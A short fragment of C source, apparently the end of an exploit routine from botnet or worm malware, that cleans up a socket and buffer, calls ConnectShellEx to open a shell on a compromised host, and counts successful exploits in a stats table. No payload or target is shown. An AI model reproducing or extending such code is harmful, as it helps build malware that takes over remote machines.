    fclosesocket(sockfd);
    Sleep(500);
    free(buff);

    if(ConnectShellEx(exinfo, bp) == true) {
        exploit[exinfo.exploit].stats++;
        return TRUE;
    }
    return FALSE;
}